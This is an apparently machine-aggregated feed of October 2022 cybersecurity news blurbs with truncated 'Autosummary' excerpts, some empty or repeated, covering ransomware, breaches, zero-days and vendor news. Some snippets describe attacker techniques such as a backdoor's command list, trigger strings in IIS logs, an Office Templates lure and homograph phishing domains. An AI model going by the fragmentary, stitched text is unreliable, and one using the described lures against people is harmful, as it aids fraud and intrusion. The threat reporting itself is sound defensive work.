The attackers also found: API keys used by Dropbox developers A few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads, and vendors “Our security teams took immediate action to coordinate the rotation of all exposed developer credentials, and determine what customer data—if any—was accessed or stolen. "Forescout Technologies has released its latest Continuum platform update which includes Forescout Continuum Timeline, a new cloud-native solution that provides long-term retention, search, and analytics of asset data. Timeline enables enterprises to meet compliance and audit requirements, better support incident investigations, and to identify risks and gaps to help prioritize preventative measures. Today, all organizations need an automated way of maintaining real-time asset intelligence for every connected device. Cybersecurity teams overwhelmed with rapid asset growth … More
The post Forescout Continuum Timeline accelerates threat detection for cybersecurity teams appeared first on Help Net Security.
"Autosummary:
This Continuum platform update expands asset discovery, assessment, and management capabilities to reduce high manual labor costs, performance issues, challenges with keeping asset databases current, business disruptions, and the risk of security breaches due to asset intelligence gaps. "Autosummary:
Software supply chain security firm Phylum revealed 29 packages in its report published yesterday: algorithmic colorsama colorwin curlapi cypress duonet faq fatnoob felpesviadinho iao incrivelsim installpy oiu pydprotect pyhints pyptext pyslyte pystyle pystyte pyurllib requests-httpx shaasigma strinfer stringe sutiltype twyne type-color typestring typesutil Taking "typesutil" as an example, Phylum researchers explained how the threat actor was injecting malicious code via the "__import__" statement into "otherwise healthy codebase" borrowed from legitimate libraries, a theme we"ve repeatedly seen before. "Autosummary:
"Autosummary:
In accordance with the requirements of your security policy, to display the contents of the document, you need to copy the file to the following folder and run it again: for Microsoft Office 2013 x32 and earlier - C:\Program Files\Microsoft Office (x86)\Templates for Microsoft Office 2013 x64 and earlier - C:\Program Files\Microsoft Office\Templates for Microsoft Office 2016 x32 and later - C:\Program Files (x86)\Microsoft Office\root\Templates for Microsoft Office 2016 x64 and later - C:\Program Files\Microsoft Office\root\Templates" While Windows will warn users that copying a file into the "Templates" folder requires "administrators" permissions, the fact that a user is attempting to copy the file indicates that there is a good chance they will also press the "Continue" button. "Threat actors are using previously undocumented Android spyware, dubbed SandStrike, to spy on a Persian-speaking religion minority. In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed in an espionage campaign targeting the Persian-speaking religion minority, Baháʼí. The threat actors were distributing a VPN app embedding a highly sophisticated spyware. The […]
The post SandStrike, a previously undocumented Android malware targets a Persian-speaking religion minority appeared first on Security Affairs.
"Autosummary:
In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed in an espionage campaign targeting the Persian-speaking religion minority, Baháʼí. "Autosummary:
While the total number of impacted news organizations is currently unknown, Proofpoint says it knows of affected media organizations (including national news outlets) from New York, Boston, Chicago, Miami, Washington, D.C., and more. "Autosummary:
In accordance with the requirements of your security policy, to display the contents of the document, you need to copy the file to the following folder and run it again: for Microsoft Office 2013 x32 and earlier - C:\Program Files\Microsoft Office (x86)\Templates for Microsoft Office 2013 x64 and earlier - C:\Program Files\Microsoft Office\Templates for Microsoft Office 2016 x32 and later - C:\Program Files (x86)\Microsoft Office\root\Templates for Microsoft Office 2016 x64 and later - C:\Program Files\Microsoft Office\root\Templates" While Windows will warn users that copying a file into the "Templates" folder requires "administrators" permissions, the fact that a user is attempting to copy the file indicates that there is a good chance they will also press the "Continue" button. "Socure announced a new partnership with Carahsoft, providing Government agencies the opportunity to access Socure’s ID+ platform, an identity verification solution that goes beyond the industry standard to analyze every element of identity, maximize accuracy and inclusivity and protect against identity fraud. Carahsoft will serve as Socure’s Master Government Aggregator, making their leading platform available through Carahsoft’s reseller partners and NASA Solutions for Enterprise-Wide Procurement (SEWP) V, National Cooperative Purchasing Alliance (NCPA), and OMNIA Partners … More
The post Socure and Carahsoft join forces to protect government agencies against identity fraud appeared first on Help Net Security.
"Autosummary:
"Synack launched an API pentesting capability powered by its global community of elite security researchers. Organizations can now rely on the Synack platform for continuous pentesting coverage across “headless” API endpoints that lack a user interface and are increasingly exposed to attackers. “Synack’s human-led, adversarial approach is ideal for testing APIs that form the backbone of society’s digital transformation,” said Synack CTO and co-founder Mark Kuhr, a former National Security Agency cybersecurity expert. “We are … More
The post Synack’s API pentesting capability empowers users to verify exploitable API vulnerabilities appeared first on Help Net Security.
"Autosummary:
"Persistent Systems launched a trailblazing solution that enables organizations to recover more quickly from cyber-attacks. Together with Google Cloud, the Persistent Intelligent Cyber Recovery (PiCR) solution provides a comprehensive and scalable cyber recovery approach, allowing organizations to reduce data loss and minimize the negative impact to brand reputation from prolonged downtime. Persistent Intelligent Cyber Recovery is now available on the Google Cloud Marketplace. Hackers are increasing the frequency and scale of ransomware attacks. They are … More
The post Persistent and Google Cloud launch a solution to help organizations recover from cyberattacks appeared first on Help Net Security.
"Autosummary:
Reduction in data loss Decreased risk of recurrent attacks through the removal of malware Faster recovery from ransomware and zero-day attacks (from weeks/months to hours/days) Potential cyber insurance cost reduction Scalable solution depending on enterprise size challenges Nitha Puthran, Senior Vice President – Cloud, Infrastructure and Security, Persistent: “The digital environment today is constantly evolving and so are the risks associated with it. "Autosummary:
Redditor RawPacket surmised if this was result of the threat actor creating a Google ad using IDN homograph technique that"d make Cyrillic "gіmp.org", which is reality is http://xn--gmp-jhd.org/, appear akin to the Latin "gimp.org." But, given the use of phishing domains "gilimp.org" and "gimp.monster" used in this campaign, the scenario seems unlikely. Google ads "display URL" vs. "landing URL" All of this has still left users puzzled as to why the Google ad showed "GIMP.org" as the destination domain in the first place, when the ad actually took users to the fake "gilimp.org" site. "Autosummary:
"Ransomware activity report: Threat actors are selling access to hundreds of organizations, with a cumulative requested price of around $4M. Research published by threat intelligence firm KELA related to ransomware activity in Q3 reveals a stable activity in the sector of initial access sales, but experts observed a rise in the value of the offerings. […]
The post Ransomware activity and network access sales in Q3 2022 appeared first on Security Affairs.
"Autosummary:
“However, excluding this one USD 3 million access, the difference wouldn’t be so serious,” Ransomware is a profitable business, and for this reason, new ransomware gangs are entering the cyber arena, is some cases the groups are composed of members of now-defunct prominent extortion groups. "Autosummary:
"The ransomware group LockBit 3.0 claimed to have stolen data from the French defence and technology group Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide. The Group invests in digital and deep tech innovations – big data, artificial intelligence, connectivity, cybersecurity and quantum – to build a future of trust, […]
The post LockBit 3.0 gang claims to have stolen data from Thales appeared first on Security Affairs.
"Autosummary:
"Categories: Android Categories: News A family of malicious apps from developer Mobile apps Group are on Google Play infected with HiddenAds. |
The post Malware on the Google Play store leads to harmful phishing sites appeared first on Malwarebytes Labs.
"Autosummary:
Diving into the Text segment of the log, where the important data is stored, there are couple of key datapoints: adDelay, chromeLink, and firstAdDelay. Many times, the activities, services, and receivers used by a particular malware is unique.However, at first glance at this malware it is hard to tell which activities, services, or receivers are running the malicious code.Additionally, after the first ad is displayed, it then has an adDelay of 7200000, or two hours. "Crypto giveaway scams have evolved into an illicit market segment with multiple services that aim to facilitate fraudulent operations. The growth of fake crypto giveaways can be explained by a significantly enhanced arsenal and availability of tools for crypto scammers, even with low technical skills. In this Help Net Security video, Tim Callan, Chief Compliance Officer at Sectigo, talks about the evolution of phishing scams and how cybercriminals are now innovating in order to access … More
The post Scams targeting cryptocurrency enthusiasts are getting more prevalent appeared first on Help Net Security.
"Autosummary:
"Netwrix announced additional findings for the healthcare sector from its global 2022 Cloud Security Report, revealing that 61% of respondents in the healthcare industry suffered a cyberattack on their cloud infrastructure within the last 12 months, compared to 53% for other verticals. Phishing was the most common type of attack reported. “The healthcare sector is a lucrative target for attackers because the chances of success are higher. The first two years of the pandemic exhausted … More
The post Cyberattacks in healthcare sector more likely to carry financial consequences appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The commands that remain in current versions are: Show embedded backdoor command list Download a file from C2 Upload a file to C2 Inject the shellcode into memory Kill a process using a process ID Change directory Send malware and system information Take a screenshot Encrypt files by a generated AES key Execute a command using WM I Config (incomplete implementation) "Autosummary:
"Reflecting on the Wannacry ransomware attack, which is the lesson learnt e why most organizations are still ignoring it. In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through a malicious code capable of encrypting data residing in information systems and demanding […]
The post Wannacry, the hybrid malware that brought the world to its knees appeared first on Security Affairs.
"Autosummary:
The ransomware, as reported in the Microsoft bulletin https://www.microsoft.com/en-us/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/, once transmitted by e-mail using phishing and social engineering methods or directly from the public network by exploiting a protocol flaw in the connected devices, proceeded: encrypt computer data, using RSA public key asymmetric encryption techniques; multiply in the affected network, through an NSA code called EternalBlue, which exploited a vulnerability in the network file sharing protocol SMB (Server Message Block) used by Microsoft Windows systems. The infection chain The infection chain was divided into four stages: The malware was installed through a dropper, a program executed by opening an attachment to a deceptive e-mail, probably a fake pdf or doc file, or executed directly from the Internet, without user interaction, exploiting the exploit described in the point 4. "Autosummary:
Poor data security practices The FTC complaint alleges that these four data breaches were the result of several poor data security practices, including Chegg failure to implement basic security measures such as the lack of MFA support, the use of a single login for all compromised databases, and not monitoring for malicious activity). "Autosummary:
"VMware warned of the availability of a public exploit for a recently addressed critical remote code execution flaw in NSX Data Center for vSphere (NSX-V). VMware warned of the existence of a public exploit targeting a recently addressed critical remote code execution (RCE) vulnerability, tracked as CVE-2021-39144 (CVSS score of 9.8), in NSX Data Center for […]
The post VMware warns of the public availability of CVE-2021-39144 exploit code appeared first on Security Affairs.
"Autosummary:
"An unofficial patch for an actively exploited flaw in Microsoft Windows that allows to bypass Mark-of-the-Web (MotW) protections. 0patch released an unofficial patch to address an actively exploited security vulnerability in Microsoft Windows that could allow bypassing Mark-of-the-Web (MotW) protections by using files signed with malformed signatures. The issue affects all supported and multiple legacy […]
The post Actively exploited Windows Mark-of-the-Web zero-day received an unofficial patch appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: Raspberry Robin Tags: FakeUpdates Tags: LockBit Tags: Clop Tags: ransomware Microsoft warns that the Raspberry Robin worm has triggered payload alerts on devices of almost 1,000 organizations in the past 30 days and is used to introduce ransomware. |
The post Raspberry Robin worm used as ransomware prelude appeared first on Malwarebytes Labs.
"Autosummary:
Microsoft found that Raspberry Robin has been used to facilitate FakeUpdates (SocGholish), Fauppod, IcedID, Bumblebee, TrueBot, LockBit, and human-operated intrusions. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Incoming OpenSSL critical fix: Organizations, users, get ready! The OpenSSL Project team has announced that, on November 1, 2022, they will release OpenSSL version 3.0.7, which will fix a critical vulnerability in the popular open-source cryptographic library (but does not affect OpenSSL versions before 3.0). Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827) For the ninth time this year, Apple has … More
The post Week in review: OpenSSL critical fix, Medibank data breach, Apple fixes zero-day vulnerability appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: October 28, 2022 Here’s a look at the most interesting products from the past week, featuring releases from ARMO, Array, AuditBoard, Illusive, Kasten by Veeam, Prove, SkyKick, and Socure. Key observations on DDoS attacks in H1 2022 In this Help Net Security video, Juniman Kasman, CTO at Nexusguard, talks about how, while the total number of attacks did grow, the average (0.59 Gbps) and maximum (232.0 Gbps) attack sizes each decreased by 56% and 66.8%, respectively, during the same period. "The BlackByte ransomware group claims to have compromised the Japanese beer and beverage company Asahi. Asahi Group Holdings, Ltd. is a global Japanese beer, spirits, soft drinks, and food business group. The Japanese beverage giant owns many popular brands, including Grolsch, such as Meantime, Peroni, and SABMiller. The BlackByte ransomware group claims to have stolen gigabytes of documents from Asahi, including […]
The post BlackByte ransomware group hit Japanese beverage giant Asahi appeared first on Security Affairs.
"Autosummary:
"The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than 40 years, the company has been delivering end-to-end services in the industries of precision metals and thin-film coatings with different teams […]
The post BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Windows Mark-of-the-Web security warning Source: BleepingComputer What made these Magniber JavaScript files stand out was that even though they contained a Mark-of-a-Web, Windows did not display any security warnings when they were launched. "The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia’s legislature was brought down. A massive cyber attack hit the Slovak and Polish parliaments, reported the authorities. The cyber attack brought down the voting system in Slovakia’s legislature. “The attack was multi-directional, including from inside the Russian […]
The post A massive cyberattack hit Slovak and Polish Parliaments appeared first on Security Affairs.
"Autosummary:
"Elektrobit and Canonical have partnered to bring the benefits of Canonical’s Ubuntu operating system to automotive software. As the industry transitions towards software-defined vehicles, the new partnership will make it easier than ever before for car makers, suppliers, and developers to create the next generation of vehicle applications, while meeting stringent automotive standards. Combining Canonical’s open-source Linux operating system with Elektrobit’s expertise in automotive-grade embedded software will enable long-term maintenance, over-the-air updates and functional vehicle … More
The post Elektrobit and Canonical join forces to build the next generation of automotive software appeared first on Help Net Security.
"Autosummary:
"Cybersecurity startup Protexxa has raised CAD$4 million in seed funding. The company aims to address the risk to businesses resulting from gaps in personal cybersecurity for both companies and individuals. Its seed funding round was led by BKR Capital, which makes transformational investments in disruptive companies and promising Black technology founders. The Firehood Angels and several angel investors, including Jeff Fettes, Annette Verschuren, and Leen Li also participated in the round. The funds will be … More
The post Protexxa raises $4 million to remediate gaps in cybersecurity for companies and individuals appeared first on Help Net Security.
"Autosummary:
Using artificial intelligence (AI), the Protexxa platform identifies, evaluates, predicts, and resolves common cyber issues. "In this Help Net Security video, Dmitry Bestuzhev, Most Distinguished Threat Researcher at BlackBerry, talks about some of the most interesting tactics, techniques, and procedures employed by cybercriminals in recent months. These are: The exploitation of Log4Shell Trojanization of security and privacy-focused tools Malicious ads based on the victim’s location and browser referrer Supply-chain attacks through open-source projects
The post Know the dangers you’re facing: 4 notable TTPs used by cybercriminals worldwide appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In general, type confusion vulnerabilities occur when the program allocates a resource, object, or variable using a type and then accesses it using a different, incompatible type, resulting in out-of-bounds memory access. "Autosummary:
The droppers distributing Vultur are the following: ‘Recover Audio, Images & Videos’ – 100,000 downloads ‘Zetter Authentication’ – 10,000 downloads ‘My Finances Tracker’ – 1,000 downloads Applications dropping Vultur malware (Threat Fabric) Like the SharkBot droppers, these droppers also display a request to install a fake update, this time disguised as a Google Play notice. The File Manager dropper app delivers a more broadly-targeting SharkBot, configured to load overlays for banks in Italy, the UK, Germany, Spain, Poland, Austria, Australia, and the United States. "Autosummary:
" Geppei"s primary function (Symantec) Depending on the string found in the IIS log, the malware will install additional malware ("Wrde" string), execute a command ("Exco" string), or drop a tool that disables IIS logging ("Cllo" string). "Autosummary:
"Autosummary:
The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. "Google Thursday released an emergency patch for Chrome 107 to address the actively exploited zero-day vulnerability CVE-2022-3723. Google released an emergency update for the Chrome 107 to address an actively exploited zero-day vulnerability tracked as CVE-2022-3723. The CVE-2022-3723 flaw is a type confusion issue that resides in the Chrome V8 Javascript engine. The flaw has been reported […]
The post Google fixes a new actively exploited Chrome zero-day, it is the seventh one this year appeared first on Security Affairs.
"Autosummary:
"Apple released updates to backport the recently released security patches for CVE-2022-42827 zero-day to older iPhones and iPads. Apple has released new security updates to backport security patches released this week to address actively exploited CVE-2022-42827 in older iPhones and iPads, addressing an actively exploited zero-day bug. Early this week, Apple addressed the ninth zero-day […]
The post Apple backports fixes for CVE-2022-42827 zero-day to older iPhones, iPads appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @BleepinComputer, @struppigel, @malwrhunterteam, @serghei, @fwosar, @Ionut_Ilascu, @DanielGallagher, @VK_Intel, @jorntvdw, @demonslay335, @billtoulas, @FourOctets, @Seifreed, @PolarToffee, @malwareforme, @AlvieriD, @_CERT_UA, @Jeremy_Kirk, @MsftSecIntel, @pcrisk, @TrendMicro, @DragosInc, and @BrettCallow. We also learned more information about new and existing ransomware attacks, such as an alleged 60 million LockBit ransomware demand on Pendragon, Hive claiming the attack on Tata Power, Medibank warning that the hackers accessed all customers" personal data, a ransomware attack on the Indianapolis Housing Agency, and Australian Clinical Labs disclosing that patient data was stolen. "Autosummary:
While patching critical vulnerabilities is always commendable, doing it at the end of the week, on a Friday evening, is unfortunate, if not dangerous, timing. "Categories: Exploits and vulnerabilities Categories: News Google has issued an update for Chrome to fix an issue in the V8 JavaScript engine |
The post A Chrome fix for an in-the-wild exploit is out—Check your version appeared first on Malwarebytes Labs.
"Autosummary:
Mitigation If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. "OPSWAT has acquired all assets of FileScan.IO and FileScan.IO’s founder and CEO Jan Miller has joined OPSWAT as Director of Engineering of Malware Analysis Solutions. “I’m delighted to announce the FileScan.IO asset acquisition and the addition of Jan to our team,” stated Benny Czarny, Founder and CEO of OPSWAT. “Jan continues to develop outstanding technologies over the last decade, and is committed to providing important free resources and innovative technologies to the broad cybersecurity community. … More
The post OPSWAT acquires FileScan.IO to provide organizations with malware analysis technology appeared first on Help Net Security.
"Autosummary:
We look forward to enhancing the technology into an enterprise-grade, robust and mature solution to deliver the most comprehensive and innovative malware analysis platform available today.”, Czarny continued. "Employer demand for cybersecurity professionals continues to strain talent availability, according to new data from CyberSeek. For the 12-month period ending in September 2022, employers listed 769,736 openings for cybersecurity positions or jobs requiring cybersecurity skills. Employer demand for cybersecurity workers grew 2.4 times faster than the overall rate across the U.S. economy. Nine of the 10 top months for cybersecurity job postings in the past 10 years have occurred in 2022. Despite a slight … More
The post Cybersecurity’s importance and impact reaches all levels of the tech workforce appeared first on Help Net Security.
"Autosummary:
There is a similar expansion of cybersecurity skills requirements in adjacent positions such as auditor (+336%), software developer (+87%), cloud architect (+83%) and technical support engineer (+48%). "Check Point Research has published its Brand Phishing Report for Q3 2022, which highlights the brands which were most frequently imitated by criminals in their attempts to steal individuals’ personal information or payment credentials during July, August and September. Most imitated brand in Q3 2022 phishing attempts While LinkedIn was the most imitated brand in both Q1 and Q2 2022, it’s shipping company DHL that took the top spot in Q3, accounting for twenty-two percent … More
The post DHL takes top spot in brand phishing attempts appeared first on Help Net Security.
"Autosummary:
The malicious email which contained the subject “A document titled ‘Proposal’ has been shared with you on Onedrive” Fraudulent login page As always, users are encouraged to be cautious when divulging personal data and credentials to business applications or websites, and to think twice before opening email attachments or links, especially emails that claim to be from companies such as DHL, Microsoft or LinkedIn, as they are the most likely to be impersonated. "Open Systems has launched MDR+ IoT, which extends the 24×7 security monitoring of its MDR+ to protect connected devices used in Internet of Things (IoT) and Operational Technology (OT) applications. By adding IoT and OT telemetry to MDR+, customers benefit from 24×7 detection and response that correlates alerts across their IoT, OT and IT environments for maximum visibility and protection as part of a holistic security program. Corporate adoption of IoT and OT devices has … More
The post Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure appeared first on Help Net Security.
"Autosummary:
“Combining the strength of Open Systems’ MDR+, our next generation MDR service, together with Defender for IoT allows us to minimize the threat surface across our clients’ entire infrastructures, using the same best practices, rigor and workflow that helped Open Systems win Microsoft’s Security MSSP of the Year for 2022.”, Corn added. "Autosummary:
"That data includes first names and surnames, addresses, dates of birth, Medicare numbers, policy numbers, phone numbers, and some claims data," it noted. "Autosummary:
Code to display the fake refund message (Cyble) This action takes the victims to a phishing page that is a clone of the real Income Tax Department site, where they are directed to enter financial information, including account number, credit card number, CVV, and card PIN. "Autosummary:
Cloudflare, which also disclosed that its employees had their credentials stolen in a similar SMS phishing attack, said the attackers failed to breach its systems after having their login attempts blocked by company-issued FIDO2-compliant hardware security keys. "Autosummary:
"About this profile" Every LinkedIn member"s profile page will soon have a feature called "About this profile" where users can find out when a profile was created and last updated, as well as whether the profile"s owner has verified a phone number or work email address. "Autosummary:
"Autosummary:
Still, they all become part-time SecOPS and need to know about containers, VMs, new protocols, and who has been using an external SaaS without notifying the IT department because it"s "so super useful, we don"t care if it hasn"t been audited". And what about NGO, NPO, small companies, Media, eCommerce sites, etc. Did we, as humankind, ever have a major victory like dealing with a pandemic, sending people to the moon, or inventing complex IT devices, without teamwork?The ways cybercriminals break-in are the same as ten years ago: exploits, social engineering, Web shenanigans, and password bruteforce, to name a few.They are less defended, require less investment, and provide fewer profits, but hey, cybercriminals need to climb the ladder too. "Autosummary:
Besides ransomware, Raspberry Robin has also been used to drop other second-stage payloads onto compromised devices, including IcedID, Bumblebee, and Truebot. "Autosummary:
The threat actors leaked 86GB of data, including patient and employee details, financial reports, invoices, contracts, forms, subpoenas, and other private documents. "DEV-0950 group used Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks. Data collected by Microsoft Defender for Endpoint shows that nearly 3,000 devices in almost 1,000 organizations have seen at least one RaspberryRobin […]
The post Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs appeared first on Security Affairs.
"Autosummary:
“Given the previously documented relationship between RaspberryRobin and DEV-0206/DEV-0243 (EvilCorp), this behavioral similarity in the initial vector for Raspberry Robin infections adds another piece of evidence to the connection between the development and propagation of Fauppod/Raspberry Robin and DEV-0206/DEV-0243.” concludes the report. "Autosummary:
"Categories: Business Diving into how RaaS works, why it poses a unique threat to businesses, and how small-and-medium-sized (SMBs) businesses can prepare for the next generation of RaaS attacks. |
The post What is ransomware-as-a-service and how is it evolving? appeared first on Malwarebytes Labs.
"Autosummary:
RaaS is not much different, in theory, from the software-as-a-service (SaaS) business model, where cloud providers “rent out” their technology to you on a subscription basis—just swap out ‘cloud providers’ with ‘ransomware gangs’ and ‘technology’ with ransomware (and the related crimes involved). Why ransomware-as-a-service attacks are so dangerous The fact that RaaS attacks are human-operated means that ransomware attacks are more targeted than they used to be—and targeted attacks are far more dangerous than un-targeted ones. At the forefront of this evolution from automated ransomware to human-operated ransomware attacks are ransomware-as-a-service gangs—and their new business model seems to be paying off: in 2021, ransomware gangs made at least $350 million in ransom payments. How ransomware-as-a-service changed the game Why ransomware-as-a-service attacks are so dangerous Is ransomware here to stay? "Categories: News Tags: Medibank Tags: data breach Australian health care insurance company Medibank confirmed that the threat actor behind the cyberattack on the company had access to the data of at least 4 million customers |
The post Medibank customers" personal data compromised by cyber attack appeared first on Malwarebytes Labs.
"Autosummary:
Stolen data The cybercrime investigation shows that the criminal had access to: All ahm customers’ personal data and significant amounts of health claims data All international student customers’ personal data and significant amounts of health claims data All Medibank customers’ personal data and significant amounts of health claims data This does not necessarily mean that all these data have been stolen, but Medibank has been contacted by the threat actor claiming to have stolen 200GB of data. "33N Ventures is fundraising €150 million for investing in cybersecurity and infrastructure software companies across Europe, Israel, and the US. The fund will mostly target investments at Series A and B, with an average ticket size of around €10 million, and has an investment capacity of €20 million already committed by Alantra and its strategic partners. Co-founders and managing partners Carlos Alberto Silva and Carlos Moreira da Silva have made more than 20 investments in … More
The post How cybersecurity VCs find visionary companies in emerging sectors appeared first on Help Net Security.
"Autosummary:
Our strategic advisors – including leading entrepreneurs, experts, and cybersecurity decision-makers such Brian NeSmith (Arctic Wolf), Eyal Hayardeny (Reblaze), Nuno Sebastião (Feedzai), and Pierre Polette (Hackuity) – all founders of companies we’ve invested in in the past – possess an incredible depth and breadth of sector-specific knowledge and experience that, added to our own, really helps us identify and support the founders and companies with the biggest breakthrough and scaling potential.That’s not going to change – from digital transformation to national security, cyber will continue being a top priority for governments, institutions, companies, and investors across the globe, and the market is expected to reach $162 billion in 2022, with robust annual double-digit growth forecast for the coming years – and so the companies we’ll be looking at have some in-built resilience. Of course, we stay up to date with the industry, look at all publicly available sources, and attend the most relevant cybersecurity events across Europe, Israel, and the US. In this Help Net Security interview, they discuss the cybersecurity investment landscape in Europe, the strategies for finding the right companies, and more. Co-founders and managing partners Carlos Alberto Silva and Carlos Moreira da Silva have made more than 20 investments in cybersecurity and infrastructure software over the past 10 years, across Europe, Israel and the US – including most notably Arctic Wolf. "In the world of insurance providers and policies, cyber insurance is a fairly new field. And many security teams are trying to wrap their heads around it. What is it and do they need it? And with what time will they spend researching how to integrate cyber insurance into their strategy? For small security teams, this is particularly challenging as they contend with limited resources. Luckily, there’s a new eBook dedicated to helping small security … More
The post A quick guide for small cybersecurity teams looking to invest in cyber insurance appeared first on Help Net Security.
"Autosummary:
The market varies widely, with policies often determined by insurance providers, but the primary forms of cyber insurance include: Network security systems policies which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs. Privacy liability policies which cover any costs related to a data breach that exposes personally identifiable information (PII), i.e. lawsuits, compliance violations, reputational risk management, etc. Network business interruption policies that enable a business to cover costs related to data loss or any financial losses incurred by a disruption in services. "The impact of the Great Resignation and the Great Reshuffle is still strongly felt across many industries, including cybersecurity. There is a talent gap: Companies are struggling to hire enough talent to fulfill their needs and goals. Widen the pool of cybersecurity job candidates According to a McKinsey Global Survey, nearly nine out of 10 executives and managers say their organizations face a skills gap or expect one to develop by 2024. This means the … More
The post Fill the cybersecurity talent gap with inquisitive job candidates appeared first on Help Net Security.
"Autosummary:
It won’t be easy, and training will be necessary, but with the proper supportive environment, a diverse set of skills will help you build a stronger cybersecurity team.When beginning a career in cybersecurity, with or without a degree or previous experience in the field, there are many learning opportunities, but also multiple learning curves. "Autosummary:
"Shifting ransomware payloads over time from BlackCat, Quantum Locker, and Zeppelin, DEV-0832"s latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant"s cybersecurity division said. "Autosummary:
"The Irish Reporting and Information Security Service’s (IRISSCERT) Conference on Cybercrime will be on the 10th of November 2022 in the Aviva stadium. This all-day conference will focus on providing attendees with an overview of the current cyber threats facing businesses in Ireland and what they can do to help deal with those threats. With the ransomware attack on the HSE still fresh in many people’s minds and the increasing focus on cybersecurity resulting from … More
The post IRISSCERT brings eminent cybersecurity experts to its conference in Dublin appeared first on Help Net Security.
"Autosummary:
"Cisco warns of active exploitation attempts targeting two vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows. Cisco is warning of exploitation attempts targeting two security flaws, tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in the Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities are dated 2020 and are now patched. The […]
The post Two flaws in Cisco AnyConnect Secure Mobility client for Windows actively exploited appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Manual Testing: All our pen testing reports are peer-reviewed by our security experts, giving you the most accurate view of the vulnerability findings, including business logic errors and backdoors that automated scanners missed Zero false positives: All vulnerabilities are peer-reviewed to ensure zero false positives in the vulnerability reports.With Outpost24"s PTaaS, you can enable robust application security for your organization in order to: Eliminate web application vulnerabilities: PTaaS helps organizations continuously find and fix web application vulnerabilities, including runtime vulnerabilities and logical errors before they can be exploited. Introducing Outpost24"s Pentesting-as-a-Service Web application testing is critical to your organization"s security posture, but the traditional pen testing process can"t keep up with the pace of agile development. "Autosummary:
While data access and data exfiltration are separate things, Medibank found evidence that, in some cases, the threat actors managed to remove some of the accessed data, so customers should assume that all of this data was stolen. "Autosummary:
"Autosummary:
Just as importantly, the training provides full prep for CISSP, CISM, CISA, and other important exams. "Autosummary:
"As package delivery scams that spoof DHL, USPS and other delivery companies soar, here’s how to stay safe not just this shopping season
The post Parcel delivery scams are on the rise: Do you know what to watch out for? appeared first on WeLiveSecurity
"Autosummary:
Consider the following: Don’t click on links to enter personal information, including login credentials and financial information, from an unsolicited email or text message Regularly back up your device Look out for the tell-tale signs of a phishing scam: urgency, out-of-the-blue requests for financial or other information, imposter URLs, spelling and grammatical errors, and requests for money in return for delivery If you receive an email that looks suspicious, visit the official website of the delivery company rather than follow a link embedded into the message Download reputable multi-layered security software with anti-phishing capabilities to all your devices As the holiday season approaches, there’s an even greater chance that we’ll either lose track of what we’ve bought or we’ll be expecting gifts purchased by others. They could be: a request for an additional payment to complete delivery: a demand for payment due to a supposedly incorrect delivery address: a request for email verification (password) in order to track a (non-existent) parcel: a request for name, full address and phone number, due to “delivery failure”: There are also multiple varieties of smishing (phishing via text) scams of this sort, which leverage the fact that many delivery companies also update their customers via SMS. "International ticketing services company See Tickets disclosed a data breach that exposed customers’ payment card details. Ticketing service company See Tickets disclosed a data breach, and threat actors might have accessed customers’ payment card details. Threat actors were able to steal payment card data by implanting a software skimmer on its website. The company discovered […]
The post See Tickets discloses data breach, customers’ credit card data exposed appeared first on Security Affairs.
"Autosummary:
Stolen data includes name, address, zip code, payment card number, card expiration date, and CVV number. "Categories: News Categories: Ransomware Tags: DAIXIN Tags: FBI Tags: CISA Tags: HHS Tags: ransomware team Tags: DAIXIN Team Tags: ransomware The FBI, CISA, and HSH have issued a joint advisory about a new threat to healthcare organizations |
The post US agencies issue warning about DAIXIN Team ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 26, 2022 by The FBI, CISA, and HSH have issued a joint advisory about a new threat to healthcare organizations The FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have issued a joint advisory about DAIXIN Team, a fledgling ransomware and data exfiltration group that has been targeting US healthcare. "Categories: News Tags: POS Tags: malware Tags: credit card Tags: credit identity theft Tags: C2 Tags: MajikPOS Tags: Treasure Hunter Researchers have discovered the theft of 167,000 sets of credit card detials by MajikPOS and Treasure Hunter POS malware |
The post Point-of-sale malware used to steal 167,000 credit cards appeared first on Malwarebytes Labs.
"Autosummary:
